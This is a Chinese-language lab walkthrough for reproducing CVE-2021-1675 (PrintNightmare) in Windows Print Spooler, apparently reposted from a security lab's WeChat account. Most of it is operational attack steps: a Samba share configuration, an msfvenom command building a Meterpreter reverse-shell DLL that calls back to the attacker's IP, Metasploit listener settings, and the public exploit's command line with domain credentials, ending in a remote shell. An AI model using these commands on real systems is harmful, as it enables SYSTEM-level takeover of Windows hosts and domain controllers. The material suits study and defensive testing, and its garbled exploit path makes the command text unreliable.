漏洞介绍
Windows PrintSpooler是打印后台处理服务,即管理所有本地和网络打印队列及控制所有打印工作。Windows PrintSpooler 存在权限提升漏洞,经过身份认证的攻击者可利用此漏洞使 Spooler 服务加载恶意DLL,从而获取权限提升。利用此漏洞需身份认证,攻击者可通过多种方式获得身份认证信息。在域环境中合适的条件下,未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。
漏洞范围
Windows Server2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Coreinstallation)Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 for x64-based Systems Service Pack 2 (Server Coreinstallation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Coreinstallation)Windows Server 2008 for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server, version 2004 (Server Core installation)Windows 10 Version 2004 for x64-based SystemsWindows 10 Version 2004 for ARM64-based SystemsWindows 10 Version 2004 for 32-bit SystemsWindows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
前提条件
一个普通域用户
开启Spooler服务
测试环境
靶机:Windows 10 Version 20H2 IP:192.168.101.9攻击机:kali-2020.2 IP:192.168.101.50
漏洞复现
环境搭建
1.Kali下载安装impacket
下载地址:https://github.com/cube0x0/impacket
修改smb配置文件vim /etc/samba/smb.conf添加一下内容:[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config* : backend = tdbsmb ports = 445[smb]comment = Sambapath =/tmp/guest ok = yes= no
2.启动smb服务并尝试匿名访问共享文件
启动smb服务:systemctl start smbd
查看smb服务状态:systemctl status smbd
Windows下尝试访问共享文件
3.使用kali生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.101.50 LPORT=4444 -f dll -o /tmp/rever.dll
4.启用msfconsole调用攻击模块并监听
调用监听模块:use exploit/multi/handler设置 payload:set payload windows/x64/meterpreter/reverse_tcp查看需要的设置参数:show options设置监听地址:set lhost 192.168.101.50设置监听端口:set lport 4444执行:run
5.利用已知域用户上传并执行dll文件反弹shell
exp下载地址: https://github.com/cube0x0/CVE-2021-1675
exp使用方法: python3 CVE-2021-1675.py 域名/域用户:密码@域中的ip '\监听者IPsmbdll文件名'python3 CVE-2021-1675.py test.com/admin:Test.com@192.168.101.9'\192.168.101.50smbrever.dll'执行命令ipconfig
成功反弹shell
原文始发于微信公众号(赛瑞攻防实验室):CVE-2021-1675 Windows Print Spooler 远程命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论